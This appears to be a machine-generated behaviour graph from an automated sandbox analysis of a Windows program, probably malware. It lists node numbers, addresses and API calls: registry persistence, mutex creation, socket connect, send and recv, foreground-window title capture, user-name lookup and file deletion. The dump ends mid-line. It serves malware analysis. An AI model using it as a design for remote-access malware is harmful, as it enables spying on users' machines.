93884->93888 93895 469bb2c 40 API calls 93885->93895 93889 466f1ed 93886->93889 93890 466f293 CreateThread 93887->93890 93891 466f29f 93887->93891 94999 466f7e2 93887->94999 93888->93887 93892 4661f09 11 API calls 93889->93892 93890->93891 95027 4672132 138 API calls 93890->95027 93893 466f2b4 93891->93893 93894 466f2a8 CreateThread 93891->93894 93896 466f1f6 CreateThread 93892->93896 93898 466f307 93893->93898 93900 4662093 28 API calls 93893->93900 93894->93893 95029 4672716 38 API calls ___scrt_get_show_window_mode 93894->95029 93897 466f247 93895->93897 93896->93863 95031 4661be9 50 API calls 93896->95031 94348 466c19d 7 API calls 93897->94348 94164 467353a RegOpenKeyExA 93898->94164 93901 466f2d7 93900->93901 94349 46652fd 28 API calls 93901->94349 93907 466f328 93909 467bcef 28 API calls 93907->93909 93911 466f338 93909->93911 94350 4673656 31 API calls 93911->94350 93915 466f34e 93916 4661f09 11 API calls 93915->93916 93918 466f359 93916->93918 93917 466f381 DeleteFileW 93917->93918 93919 466f388 93917->93919 93918->93725 93918->93917 93920 466f36f Sleep 93918->93920 93919->93725 93920->93918 93921->93595 93922->93603 93923->93602 93924->93612 93925->93613 93926->93615 93927->93618 93928->93622 93929->93624 93930->93627 93931->93625 93933 4695034 93932->93933 93934 4695036 IsProcessorFeaturePresent 93932->93934 93933->93633 93936 4695078 93934->93936 93939 469503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 93936->93939 93938 469515b 93938->93633 93939->93938 93941 4696f27 93940->93941 93941->93636 93941->93941 93943 46af0e2 93942->93943 93944 46af0eb 93942->93944 93947 46aefd8 49 API calls 5 library calls 93943->93947 93944->93640 93946->93640 93947->93944 93949 467cc20 LoadLibraryA GetProcAddress 93948->93949 93950 467cc10 GetModuleHandleA GetProcAddress 93948->93950 93951 467cc49 44 API calls 93949->93951 93952 467cc39 LoadLibraryA GetProcAddress 93949->93952 93950->93949 93951->93645 93952->93951 94353 467b539 FindResourceA 93953->94353 93957 466f428 _Yarn 94363 46620b7 93957->94363 93960 4661fe2 28 API calls 93961 466f44e 93960->93961 93962 4661fd8 11 API calls 93961->93962 93963 466f457 93962->93963 93964 469bda0 _Yarn 21 API calls 93963->93964 93965 466f468 _Yarn 93964->93965 94369 4666e13 93965->94369 93967 466f49b 93967->93647 93969 466210c 93968->93969 93970 46623ce 11 API calls 93969->93970 93971 4662126 93970->93971 93972 4662569 28 API calls 93971->93972 93973 4662134 93972->93973 93973->93650 94417 46620df 93974->94417 93976 4661fd8 11 API calls 93977 467bf61 93976->93977 93980 4661fd8 11 API calls 93977->93980 93978 467bf31 94423 46641a2 28 API calls 93978->94423 93979 467bebf 93979->93978 93988 4661fe2 28 API calls 93979->93988 93991 4661fd8 11 API calls 93979->93991 93995 467bf2f 93979->93995 94421 46641a2 28 API calls 93979->94421 94422 467cec5 28 API calls 93979->94422 93983 467bf69 93980->93983 93984 4661fd8 11 API calls 93983->93984 93986 466ea5f 93984->93986 93985 467bf3d 93987 4661fe2 28 API calls 93985->93987 93996 466fb52 93986->93996 93989 467bf46 93987->93989 93988->93979 93990 4661fd8 11 API calls 93989->93990 93992 467bf4e 93990->93992 93991->93979 94424 467cec5 28 API calls 93992->94424 93995->93976 93997 466fb65 93996->93997 93998 466fb5e 93996->93998 93997->93655 94425 4662163 11 API calls 93998->94425 94002 4662163 94000->94002 94001 466219f 94001->93657 94002->94001 94426 4662730 11 API calls 94002->94426 94004 4662184 94427 4662712 11 API calls std::_Deallocate 94004->94427 94007 4661e6d 94006->94007 94008 4661e75 94007->94008 94428 4662158 22 API calls 94007->94428 94008->93662 94012 46620df 11 API calls 94011->94012 94013 466532a 94012->94013 94429 46632a0 94013->94429 94015 4665346 94015->93670 94433 46651ef 94016->94433 94018 4666391 94437 4662055 94018->94437 94021 4661fe2 94022 4661ff1 94021->94022 94029 4662039 94021->94029 94023 46623ce 11 API calls 94022->94023 94024 4661ffa 94023->94024 94025 466203c 94024->94025 94027 4662015 94024->94027 94026 466267a 11 API calls 94025->94026 94026->94029 94452 4663098 28 API calls 94027->94452 94030 4661fd8 94029->94030 94031 46623ce 11 API calls 94030->94031 94032 4661fe1 94031->94032 94032->93682 94034 4661fd2 94033->94034 94035 4661fc9 94033->94035 94034->93688 94453 46625e0 28 API calls 94035->94453 94454 4661fab 94037->94454 94039 466d0ae CreateMutexA GetLastError 94039->93704 94456 467c048 94040->94456 94045 4661fe2 28 API calls 94046 467b390 94045->94046 94047 4661fd8 11 API calls 94046->94047 94048 467b398 94047->94048 94049 467b3ee 94048->94049 94050 46735e1 31 API calls 94048->94050 94049->93710 94051 467b3c1 94050->94051 94052 467b3cc StrToIntA 94051->94052 94053 467b3e3 94052->94053 94054 467b3da 94052->94054 94056 4661fd8 11 API calls 94053->94056 94464 467cffa 22 API calls 94054->94464 94056->94049 94058 4667765 94057->94058 94059 4673584 3 API calls 94058->94059 94060 466776c 94059->94060 94060->93722 94060->93723 94062 467bd03 94061->94062 94465 466b93f 94062->94465 94064 467bd0b 94064->93738 94066 4661f22 94065->94066 94073 4661f6a 94065->94073 94067 4662252 11 API calls 94066->94067 94068 4661f2b 94067->94068 94069 4661f6d 94068->94069 94070 4661f46 94068->94070 94498 4662336 94069->94498 94497 466305c 28 API calls 94070->94497 94074 4661f09 94073->94074 94075 4662252 11 API calls 94074->94075 94076 4661f12 94075->94076 94076->93750 94078 46739a0 94077->94078 94079 4666e13 28 API calls 94078->94079 94080 46739b5 94079->94080 94081 46620f6 28 API calls 94080->94081 94082 46739c5 94081->94082 94083 46737aa 14 API calls 94082->94083 94084 46739cf 94083->94084 94085 4661fd8 11 API calls 94084->94085 94086 46739dc 94085->94086 94086->93798 94088 466209b 94087->94088 94089 46623ce 11 API calls 94088->94089 94090 46620a6 94089->94090 94502 46624ed 94090->94502 94094 46737fa 94093->94094 94096 46737c3 94093->94096 94095 4661fd8 11 API calls 94094->94095 94097 466efd9 94095->94097 94098 46737d5 RegSetValueExA RegCloseKey 94096->94098 94097->93801 94098->94094 94100 469bb45 _swprintf 94099->94100 94506 469ae83 94100->94506 94102 466eff2 94102->93807 94102->93809 94104 467b596 GetLocalTime 94103->94104 94105 467b631 94103->94105 94107 466531e 28 API calls 94104->94107 94106 4661fd8 11 API calls 94105->94106 94108 467b639 94106->94108 94109 467b5d8 94107->94109 94110 4661fd8 11 API calls 94108->94110 94111 4666383 28 API calls 94109->94111 94113 466f048 94110->94113 94112 467b5e4 94111->94112 94534 4662f10 94112->94534 94113->93825 94116 4666383 28 API calls 94117 467b5fc 94116->94117 94539 466723b 77 API calls 94117->94539 94119 467b60a 94120 4661fd8 11 API calls 94119->94120 94121 467b616 94120->94121 94122 4661fd8 11 API calls 94121->94122 94123 467b61f 94122->94123 94124 4661fd8 11 API calls 94123->94124 94125 467b628 94124->94125 94126 4661fd8 11 API calls 94125->94126 94126->94105 94128 4669e3d _wcslen 94127->94128 94129 4669e5f 94128->94129 94130 4669e48 94128->94130 94132 466da6f 31 API calls 94129->94132 94131 466da6f 31 API calls 94130->94131 94133 4669e50 94131->94133 94134 4669e67 94132->94134 94136 4661f13 28 API calls 94133->94136 94135 4661f13 28 API calls 94134->94135 94137 4669e75 94135->94137 94151 4669e5a 94136->94151 94138 4661f09 11 API calls 94137->94138 94139 4669e7d 94138->94139 94568 4669196 28 API calls 94139->94568 94140 4661f09 11 API calls 94142 4669eb4 94140->94142 94553 466a144 94142->94553 94143 4669e8f 94569 4663014 94143->94569 94148 4661f13 28 API calls 94149 4669ea4 94148->94149 94150 4661f09 11 API calls 94149->94150 94150->94151 94151->94140 94153 467b6c1 GetUserNameW 94152->94153 94621 466417e 94153->94621 94158 4663014 28 API calls 94159 467b703 94158->94159 94160 4661f09 11 API calls 94159->94160 94161 467b70c 94160->94161 94162 4661f09 11 API calls 94161->94162 94163 466f25e 94162->94163 94163->93878 94165 466f31f 94164->94165 94166 467355b RegQueryValueExA RegCloseKey 94164->94166 94165->93751 94165->93907 94166->94165 94168 466f3cd 94167->94168 94169 4673a7a RegDeleteValueW 94167->94169 94168->93745 94169->94168 94171 466dd96 94170->94171 94172 467353a 3 API calls 94171->94172 94173 466dd9d 94172->94173 94177 466ddbc 94173->94177 94713 4661707 94173->94713 94175 466ddaa 94716 46738b2 RegCreateKeyA 94175->94716 94178 4674f65 94177->94178 94179 46620df 11 API calls 94178->94179 94180 4674f79 94179->94180 94730 467b944 94180->94730 94183 46620df 11 API calls 94184 4674f8f 94183->94184 94185 4661e65 22 API calls 94184->94185 94186 4674f9d 94185->94186 94187 469bb2c 40 API calls 94186->94187 94188 4674faa 94187->94188 94189 4674faf Sleep 94188->94189 94190 4674fbc 94188->94190 94189->94190 94191 4662093 28 API calls 94190->94191 94192 4674fcb 94191->94192 94193 4661e65 22 API calls 94192->94193 94194 4674fd4 94193->94194 94195 46620f6 28 API calls 94194->94195 94196 4674fdf 94195->94196 94197 467beac 28 API calls 94196->94197 94198 4674fe7 94197->94198 94734 466489e WSAStartup 94198->94734 94200 4674ff1 94201 4661e65 22 API calls 94200->94201 94202 4674ffa 94201->94202 94203 4661e65 22 API calls 94202->94203 94227 4675079 94202->94227 94204 4675013 94203->94204 94205 4661e65 22 API calls 94204->94205 94207 4675024 94205->94207 94206 46620f6 28 API calls 94206->94227 94209 4661e65 22 API calls 94207->94209 94208 467beac 28 API calls 94208->94227 94210 4675035 94209->94210 94212 4661e65 22 API calls 94210->94212 94211 4666c59 28 API calls 94211->94227 94213 4675046 94212->94213 94215 4661e65 22 API calls 94213->94215 94214 4661fe2 28 API calls 94214->94227 94216 4675057 94215->94216 94217 4661e65 22 API calls 94216->94217 94218 4675069 94217->94218 94908 466473d 89 API calls 94218->94908 94220 4661e65 22 API calls 94220->94227 94222 46751c7 WSAGetLastError 94909 467cb72 30 API calls 94222->94909 94227->94206 94227->94208 94227->94211 94227->94214 94227->94220 94227->94222 94230 466531e 28 API calls 94227->94230 94231 4661e8d 11 API calls 94227->94231 94232 469bb2c 40 API calls 94227->94232 94234 4662093 28 API calls 94227->94234 94235 467b580 80 API calls 94227->94235 94238 4669097 28 API calls 94227->94238 94240 4673733 3 API calls 94227->94240 94241 46735e1 31 API calls 94227->94241 94242 466417e 28 API calls 94227->94242 94245 467bdaf 28 API calls 94227->94245 94246 467bc1f 28 API calls 94227->94246 94247 4661e65 22 API calls 94227->94247 94254 4662ea1 28 API calls 94227->94254 94255 4666383 28 API calls 94227->94255 94256 4662f10 28 API calls 94227->94256 94258 4661fd8 11 API calls 94227->94258 94260 4675a6e 94227->94260 94262 4675aac CreateThread 94227->94262 94263 4661f09 11 API calls 94227->94263 94735 4674f24 94227->94735 94740 466482d 94227->94740 94747 4664f51 94227->94747 94762 46648c8 connect 94227->94762 94822 467b871 94227->94822 94825 46745f8 94227->94825 94828 46a1ed1 94227->94828 94832 466ddc4 94227->94832 94838 467bcd3 94227->94838 94846 467bb77 94227->94846 94848 467bb27 94227->94848 94853 466f90c GetLocaleInfoA 94227->94853 94856 4662f31 94227->94856 94861 4664aa1 94227->94861 94876 4664c10 94227->94876 94895 4664e26 WaitForSingleObject 94227->94895 94910 46652fd 28 API calls 94227->94910 94230->94227 94231->94227 94233 4675b0a Sleep 94232->94233 94233->94227 94234->94227 94235->94227 94238->94227 94240->94227 94241->94227 94242->94227 94245->94227 94246->94227 94248 4675474 GetTickCount 94247->94248 94841 467bc1f 94248->94841 94254->94227 94255->94227 94256->94227 94258->94227 94911 466b08c 85 API calls 94260->94911 94262->94227 94988 467ada8 105 API calls 94262->94988 94263->94227 94264->93663 94265->93671 94266->93675 94269 46620df 11 API calls 94268->94269 94270 4666c65 94269->94270 94271 46632a0 28 API calls 94270->94271 94272 4666c82 94271->94272 94272->93696 94274 46735ae RegQueryValueExA RegCloseKey 94273->94274 94275 466ebdf 94273->94275 94274->94275 94275->93693 94275->93711 94276->93700 94277->93728 94278->93722 94279->93713 94280->93730 94989 4661f86 94281->94989 94284 466dae0 94287 467c048 GetCurrentProcess 94284->94287 94285 466daab 94993 467b645 29 API calls 94285->94993 94286 466dbd4 GetLongPathNameW 94289 466417e 28 API calls 94286->94289 94290 466dae5 94287->94290 94293 466dbe9 94289->94293 94294 466db3b 94290->94294 94295 466dae9 94290->94295 94291 466dab4 94292 4661f13 28 API calls 94291->94292 94296 466dabe 94292->94296 94298 466417e 28 API calls 94293->94298 94300 466417e 28 API calls 94294->94300 94299 466417e 28 API calls 94295->94299 94304 4661f09 11 API calls 94296->94304 94297 466daa1 94297->94286 94301 466dbf8 94298->94301 94303 466daf7 94299->94303 94302 466db49 94300->94302 94996 466de0c 28 API calls 94301->94996 94309 466417e 28 API calls 94302->94309 94308 466417e 28 API calls 94303->94308 94304->94297 94306 466dc0b 94997 4662fa5 28 API calls 94306->94997 94310 466db0d 94308->94310 94312 466db5f 94309->94312 94994 4662fa5 28 API calls 94310->94994 94311 466dc16 94998 4662fa5 28 API calls 94311->94998 94995 4662fa5 28 API calls 94312->94995 94316 466db6a 94321 4661f13 28 API calls 94316->94321 94317 466db18 94320 4661f13 28 API calls 94317->94320 94318 466dc20 94319 4661f09 11 API calls 94318->94319 94322 466dc2a 94319->94322 94324 466db23 94320->94324 94323 466db75 94321->94323 94325 4661f09 11 API calls 94322->94325 94327 4661f09 11 API calls 94323->94327 94326 4661f09 11 API calls 94324->94326 94328 466dc33 94325->94328 94330 466db2c 94326->94330 94329 466db7e 94327->94329 94331 4661f09 11 API calls 94328->94331 94333 4661f09 11 API calls 94329->94333 94332 4661f09 11 API calls 94330->94332 94334 466dc3c 94331->94334 94332->94296 94333->94296 94335 4661f09 11 API calls 94334->94335 94336 466dc45 94335->94336 94337 4661f09 11 API calls 94336->94337 94338 466dc4e 94337->94338 94338->93787 94339->93799 94340->93821 94342 4673759 RegQueryValueExA RegCloseKey 94341->94342 94343 467377d 94341->94343 94342->94343 94343->93780 94344->93813 94345->93849 94346->93859 94347->93883 94348->93870 94350->93915 94351->93720 94354 467b556 LoadResource LockResource SizeofResource 94353->94354 94355 466f419 94353->94355 94354->94355 94356 469bda0 94355->94356 94361 46a61b8 ___crtLCMapStringA 94356->94361 94357 46a61f6 94373 46a062d 20 API calls __dosmaperr 94357->94373 94358 46a61e1 RtlAllocateHeap 94360 46a61f4 94358->94360 94358->94361 94360->93957 94361->94357 94361->94358 94372 46a3001 7 API calls 2 library calls 94361->94372 94364 46620bf 94363->94364 94374 46623ce 94364->94374 94366 46620ca 94378 466250a 94366->94378 94368 46620d9 94368->93960 94370 46620b7 28 API calls 94369->94370 94371 4666e27 94370->94371 94371->93967 94372->94361 94373->94360 94375 4662428 94374->94375 94376 46623d8 94374->94376 94375->94366 94376->94375 94385 46627a7 11 API calls std::_Deallocate 94376->94385 94379 466251a 94378->94379 94380 4662535 94379->94380 94381 4662520 94379->94381 94396 46628e8 94380->94396 94386 4662569 94381->94386 94384 4662533 94384->94368 94385->94375 94407 4662888 94386->94407 94388 466257d 94389 46625a7 94388->94389 94390 4662592 94388->94390 94392 46628e8 28 API calls 94389->94392 94412 4662a34 22 API calls 94390->94412 94395 46625a5 94392->94395 94393 466259b 94413 46629da 22 API calls 94393->94413 94395->94384 94397 46628f1 94396->94397 94398 4662953 94397->94398 94399 46628fb 94397->94399 94416 46628a4 22 API calls 94398->94416 94402 4662904 94399->94402 94403 4662917 94399->94403 94415 4662cae 28 API calls __EH_prolog 94402->94415 94405 4662915 94403->94405 94406 46623ce 11 API calls 94403->94406 94405->94384 94406->94405 94408 4662890 94407->94408 94409 4662898 94408->94409 94414 4662ca3 22 API calls 94408->94414 94409->94388 94412->94393 94413->94395 94415->94405 94418 46620e7 94417->94418 94419 46623ce 11 API calls 94418->94419 94420 46620f2 94419->94420 94420->93979 94421->93979 94422->93979 94423->93985 94424->93995 94425->93997 94426->94004 94427->94001 94430 46632aa 94429->94430 94431 46628e8 28 API calls 94430->94431 94432 46632c9 94430->94432 94431->94432 94432->94015 94434 46651fb 94433->94434 94443 4665274 94434->94443 94436 4665208 94436->94018 94438 4662061 94437->94438 94439 46623ce 11 API calls 94438->94439 94440 466207b 94439->94440 94448 466267a 94440->94448 94444 4665282 94443->94444 94447 46628a4 22 API calls 94444->94447 94449 466268b 94448->94449 94450 46623ce 11 API calls 94449->94450 94451 466208d 94450->94451 94451->94021 94452->94029 94453->94034 94455 4662246 94454->94455 94455->94039 94457 467c055 GetCurrentProcess 94456->94457 94458 467b362 94456->94458 94457->94458 94459 46735e1 RegOpenKeyExA 94458->94459 94460 467360f RegQueryValueExA RegCloseKey 94459->94460 94461 4673639 94459->94461 94460->94461 94462 4662093 28 API calls 94461->94462 94463 467364e 94462->94463 94463->94045 94464->94053 94466 466b947 94465->94466 94471 4662252 94466->94471 94468 466b952 94475 466b967 94468->94475 94470 466b961 94470->94064 94472 46622ac 94471->94472 94473 466225c 94471->94473 94472->94468 94473->94472 94482 4662779 11 API calls std::_Deallocate 94473->94482 94476 466b973 94475->94476 94477 466b9a1 94475->94477 94483 46627e6 94476->94483 94494 46628a4 22 API calls 94477->94494 94481 466b97d 94481->94470 94482->94472 94484 46627ef 94483->94484 94485 4662851 94484->94485 94486 46627f9 94484->94486 94496 46628a4 22 API calls 94485->94496 94489 4662802 94486->94489 94490 4662815 94486->94490 94495 4662aea 28 API calls __EH_prolog 94489->94495 94492 4662813 94490->94492 94493 4662252 11 API calls 94490->94493 94492->94481 94493->94492 94495->94492 94497->94073 94499 4662347 94498->94499 94500 4662252 11 API calls 94499->94500 94501 46623c7 94500->94501 94501->94073 94503 46624f9 94502->94503 94504 466250a 28 API calls 94503->94504 94505 46620b1 94504->94505 94505->93792 94522 469ba8a 94506->94522 94508 469aed0 94528 469a837 36 API calls 2 library calls 94508->94528 94510 469aeaa 94527 46a062d 20 API calls __dosmaperr 94510->94527 94511 469ae95 94511->94508 94511->94510 94521 469aeaf pre_c_initialization 94511->94521 94514 469aedc 94515 469af0b 94514->94515 94529 469bacf 40 API calls __Tolower 94514->94529 94518 469af77 94515->94518 94530 469ba36 20 API calls 2 library calls 94515->94530 94531 469ba36 20 API calls 2 library calls 94518->94531 94519 469b03e _swprintf 94519->94521 94532 46a062d 20 API calls __dosmaperr 94519->94532 94521->94102 94523 469ba8f 94522->94523 94524 469baa2 94522->94524 94533 46a062d 20 API calls __dosmaperr 94523->94533 94524->94511 94526 469ba94 pre_c_initialization 94526->94511 94527->94521 94528->94514 94529->94514 94530->94518 94531->94519 94532->94521 94533->94526 94540 4661fb0 94534->94540 94536 4662f1e 94537 4662055 11 API calls 94536->94537 94538 4662f2d 94537->94538 94538->94116 94539->94119 94543 46625f0 94540->94543 94542 4661fbd 94542->94536 94544 4662888 22 API calls 94543->94544 94545 4662602 94544->94545 94546 4662672 94545->94546 94547 4662629 94545->94547 94552 46628a4 22 API calls 94546->94552 94550 46628e8 28 API calls 94547->94550 94551 466263b 94547->94551 94550->94551 94551->94542 94554 466a162 94553->94554 94555 4673584 3 API calls 94554->94555 94556 466a169 94555->94556 94557 466a197 94556->94557 94558 466a17d 94556->94558 94561 4669097 28 API calls 94557->94561 94559 466a182 94558->94559 94560 4669ed6 94558->94560 94574 4669097 94559->94574 94560->93844 94563 466a1a5 94561->94563 94581 466a1b4 86 API calls 94563->94581 94567 466a195 94567->94560 94568->94143 94598 4663222 94569->94598 94571 4663022 94602 4663262 94571->94602 94575 46690ad 94574->94575 94576 4662252 11 API calls 94575->94576 94577 46690c7 94576->94577 94582 4664267 94577->94582 94579 46690d5 94580 466a268 29 API calls 94579->94580 94580->94567 94594 466a2ae 163 API calls 94580->94594 94581->94560 94595 466a2c4 48 API calls 94581->94595 94596 466a2a2 86 API calls 94581->94596 94597 466a2b8 128 API calls 94581->94597 94583 4662888 22 API calls 94582->94583 94584 466427b 94583->94584 94585 46642a5 94584->94585 94586 4664290 94584->94586 94588 46627e6 28 API calls 94585->94588 94592 46642df 22 API calls 94586->94592 94591 46642a3 94588->94591 94589 4664299 94593 4662c48 22 API calls 94589->94593 94591->94579 94592->94589 94593->94591 94599 466322e 94598->94599 94608 4663618 94599->94608 94601 466323b 94601->94571 94603 466326e 94602->94603 94604 4662252 11 API calls 94603->94604 94605 4663288 94604->94605 94606 4662336 11 API calls 94605->94606 94607 4663031 94606->94607 94607->94148 94609 4663626 94608->94609 94610 4663644 94609->94610 94611 466362c 94609->94611 94613 466369e 94610->94613 94614 466365c 94610->94614 94619 46636a6 28 API calls 94611->94619 94620 46628a4 22 API calls 94613->94620 94617 46627e6 28 API calls 94614->94617 94618 4663642 94614->94618 94617->94618 94618->94601 94619->94618 94622 4664186 94621->94622 94623 4662252 11 API calls 94622->94623 94624 4664191 94623->94624 94632 46641bc 94624->94632 94627 46642fc 94643 4664353 94627->94643 94629 466430a 94630 4663262 11 API calls 94629->94630 94631 4664319 94630->94631 94631->94158 94633 46641c8 94632->94633 94636 46641d9 94633->94636 94635 466419c 94635->94627 94637 46641e9 94636->94637 94638 4664206 94637->94638 94639 46641ef 94637->94639 94640 46627e6 28 API calls 94638->94640 94641 4664267 28 API calls 94639->94641 94642 4664204 94640->94642 94641->94642 94642->94635 94644 466435f 94643->94644 94647 4664371 94644->94647 94646 466436d 94646->94629 94648 466437f 94647->94648 94649 4664385 94648->94649 94650 466439e 94648->94650 94711 46634e6 28 API calls 94649->94711 94651 4662888 22 API calls 94650->94651 94652 46643a6 94651->94652 94654 46643bf 94652->94654 94655 4664419 94652->94655 94657 46627e6 28 API calls 94654->94657 94666 466439c 94654->94666 94712 46628a4 22 API calls 94655->94712 94657->94666 94666->94646 94711->94666 94719 469ab1a 94713->94719 94717 46738f4 94716->94717 94718 46738ca RegSetValueExA RegCloseKey 94716->94718 94717->94177 94718->94717 94722 469aa9b 94719->94722 94721 466170d 94721->94175 94723 469aaaa 94722->94723 94724 469aabe 94722->94724 94728 46a062d 20 API calls __dosmaperr 94723->94728 94727 469aaaf pre_c_initialization __alldvrm 94724->94727 94729 46a89d7 11 API calls 2 library calls 94724->94729 94727->94721 94728->94727 94729->94727 94733 467b98a _Yarn ___scrt_get_show_window_mode 94730->94733 94731 4662093 28 API calls 94732 4674f84 94731->94732 94732->94183 94733->94731 94734->94200 94736 4674f33 94735->94736 94737 4674f3d getaddrinfo WSASetLastError 94735->94737 94912 4674dc1 29 API calls ___std_exception_copy 94736->94912 94737->94227 94739 4674f38 94739->94737 94741 4664846 socket 94740->94741 94742 4664839 94740->94742 94744 4664842 94741->94744 94745 4664860 CreateEventW 94741->94745 94913 466489e WSAStartup 94742->94913 94744->94227 94745->94227 94746 466483e 94746->94741 94746->94744 94748 4664fea 94747->94748 94749 4664f65 94747->94749 94748->94227 94750 4664f6e 94749->94750 94751 4664fc0 CreateEventA CreateThread 94749->94751 94752 4664f7d GetLocalTime 94749->94752 94750->94751 94751->94748 94915 4665150 94751->94915 94753 467bc1f 28 API calls 94752->94753 94754 4664f91 94753->94754 94914 46652fd 28 API calls 94754->94914 94763 46648ee 94762->94763 94764 4664a1b 94762->94764 94766 4664923 94763->94766 94768 466531e 28 API calls 94763->94768 94816 466497e 94763->94816 94765 4664a21 WSAGetLastError 94764->94765 94764->94816 94767 4664a31 94765->94767 94765->94816 94919 4680cf1 27 API calls 94766->94919 94769 4664a36 94767->94769 94770 4664932 94767->94770 94773 466490f 94768->94773 94924 467cb72 30 API calls 94769->94924 94776 4662093 28 API calls 94770->94776 94772 466492b 94772->94770 94775 4664941 94772->94775 94777 4662093 28 API calls 94773->94777 94785 4664987 94775->94785 94786 4664950 94775->94786 94779 4664a80 94776->94779 94780 466491e 94777->94780 94778 4664a40 94925 46652fd 28 API calls 94778->94925 94782 4662093 28 API calls 94779->94782 94783 467b580 80 API calls 94780->94783 94787 4664a8f 94782->94787 94783->94766 94921 4681ad1 54 API calls 94785->94921 94791 4662093 28 API calls 94786->94791 94792 467b580 80 API calls 94787->94792 94795 466495f 94791->94795 94792->94816 94793 466498f 94796 46649c4 94793->94796 94797 4664994 94793->94797 94799 4662093 28 API calls 94795->94799 94923 4680e97 28 API calls 94796->94923 94800 4662093 28 API calls 94797->94800 94802 466496e 94799->94802 94804 46649a3 94800->94804 94805 467b580 80 API calls 94802->94805 94807 4662093 28 API calls 94804->94807 94820 4664973 94805->94820 94806 46649cc 94808 46649f9 CreateEventW CreateEventW 94806->94808 94810 4662093 28 API calls 94806->94810 94809 46649b2 94807->94809 94808->94816 94812 467b580 80 API calls 94809->94812 94811 46649e2 94810->94811 94814 4662093 28 API calls 94811->94814 94815 46649b7 94812->94815 94817 46649f1 94814->94817 94922 4681143 52 API calls 94815->94922 94816->94227 94819 467b580 80 API calls 94817->94819 94821 46649f6 94819->94821 94920 467e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 94820->94920 94821->94808 94926 467b847 GlobalMemoryStatusEx 94822->94926 94824 467b886 94824->94227 94927 46745bb 94825->94927 94829 46a1edd 94828->94829 94957 46a1ccd 94829->94957 94831 46a1efe 94831->94227 94833 466dde0 94832->94833 94834 467353a 3 API calls 94833->94834 94836 466dde7 94834->94836 94835 466ddff 94835->94227 94836->94835 94837 4673584 3 API calls 94836->94837 94837->94835 94839 46620b7 28 API calls 94838->94839 94840 467bce8 94839->94840 94840->94227 94842 46a1ed1 20 API calls 94841->94842 94843 467bc43 94842->94843 94844 4662093 28 API calls 94843->94844 94845 467bc51 94844->94845 94845->94227 94847 467bb8d GetTickCount 94846->94847 94847->94227 94849 4696f10 ___scrt_get_show_window_mode 94848->94849 94850 467bb46 GetForegroundWindow GetWindowTextW 94849->94850 94851 466417e 28 API calls 94850->94851 94852 467bb70 94851->94852 94852->94227 94854 4662093 28 API calls 94853->94854 94855 466f931 94854->94855 94855->94227 94857 46620df 11 API calls 94856->94857 94858 4662f3d 94857->94858 94859 46632a0 28 API calls 94858->94859 94860 4662f59 94859->94860 94860->94227 94862 4664ab4 94861->94862 94962 466520c 94862->94962 94864 4664ac9 _Yarn 94865 4664b40 WaitForSingleObject 94864->94865 94866 4664b20 94864->94866 94868 4664b56 94865->94868 94867 4664b32 send 94866->94867 94869 4664b7b 94867->94869 94968 46810cb 54 API calls 94868->94968 94872 4661fd8 11 API calls 94869->94872 94871 4664b69 SetEvent 94871->94869 94873 4664b83 94872->94873 94874 4661fd8 11 API calls 94873->94874 94875 4664b8b 94874->94875 94875->94227 94877 46620df 11 API calls 94876->94877 94878 4664c27 94877->94878 94879 46620df 11 API calls 94878->94879 94882 4664c30 94879->94882 94880 469bda0 _Yarn 21 API calls 94880->94882 94882->94880 94883 46620b7 28 API calls 94882->94883 94884 4664ca1 94882->94884 94885 4661fe2 28 API calls 94882->94885 94888 4661fd8 11 API calls 94882->94888 94892 4664c84 94882->94892 94977 4664b96 94882->94977 94883->94882 94886 4664e26 99 API calls 94884->94886 94885->94882 94887 4664ca8 94886->94887 94889 4661fd8 11 API calls 94887->94889 94888->94882 94890 4664cb1 94889->94890 94891 4661fd8 11 API calls 94890->94891 94893 4664cba 94891->94893 94983 4664cc3 32 API calls 94892->94983 94893->94227 94896 4664e57 closesocket 94895->94896 94897 4664e40 SetEvent CloseHandle 94895->94897 94899 4664e64 94896->94899 94898 4664ed8 94897->94898 94898->94227 94900 4664e7a 94899->94900 94985 46650e4 84 API calls 94899->94985 94902 4664ece SetEvent CloseHandle 94900->94902 94903 4664e8c WaitForSingleObject 94900->94903 94902->94898 94986 467e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 94903->94986 94905 4664e9b SetEvent WaitForSingleObject 94987 467e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 94905->94987 94907 4664eb3 SetEvent CloseHandle CloseHandle 94907->94902 94908->94227 94909->94227 94911->94227 94912->94739 94913->94746 94918 466515c 102 API calls 94915->94918 94917 4665159 94918->94917 94919->94772 94920->94816 94921->94793 94922->94820 94923->94806 94924->94778 94926->94824 94930 467458e 94927->94930 94931 46745a3 ___scrt_initialize_default_local_stdio_options 94930->94931 94934 469f7ed 94931->94934 94937 469c540 94934->94937 94938 469c568 94937->94938 94939 469c580 94937->94939 94952 46a062d 20 API calls __dosmaperr 94938->94952 94939->94938 94941 469c588 94939->94941 94953 469a837 36 API calls 2 library calls 94941->94953 94943 469c598 94954 469ccc6 20 API calls 2 library calls 94943->94954 94945 469502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 94947 46745b1 94945->94947 94946 469c610 94955 469d334 51 API calls 3 library calls 94946->94955 94947->94227 94950 469c56d pre_c_initialization 94950->94945 94951 469c61b 94956 469cd30 20 API calls _free 94951->94956 94952->94950 94953->94943 94954->94946 94955->94951 94956->94950 94958 46a1ce4 94957->94958 94960 46a1d1b pre_c_initialization 94958->94960 94961 46a062d 20 API calls __dosmaperr 94958->94961 94960->94831 94961->94960 94963 4665214 94962->94963 94964 46623ce 11 API calls 94963->94964 94965 466521f 94964->94965 94969 4665234 94965->94969 94967 466522e 94967->94864 94968->94871 94970 4665240 94969->94970 94971 466526e 94969->94971 94972 46628e8 28 API calls 94970->94972 94976 46628a4 22 API calls 94971->94976 94975 466524a 94972->94975 94975->94967 94978 4664ba0 WaitForSingleObject 94977->94978 94979 4664bcd recv 94977->94979 94984 4681107 54 API calls 94978->94984 94981 4664be0 94979->94981 94981->94882 94982 4664bbc SetEvent 94982->94981 94983->94882 94984->94982 94985->94900 94986->94905 94987->94907 94990 4661f8e 94989->94990 94991 4662252 11 API calls 94990->94991 94992 4661f99 94991->94992 94992->94284 94992->94285 94992->94297 94993->94291 94994->94317 94995->94316 94996->94306 94997->94311 94998->94318 95001 466f7fd 94999->95001 95000 4673584 3 API calls 95000->95001 95001->95000 95003 466f8a1 95001->95003 95005 466f891 Sleep 95001->95005 95021 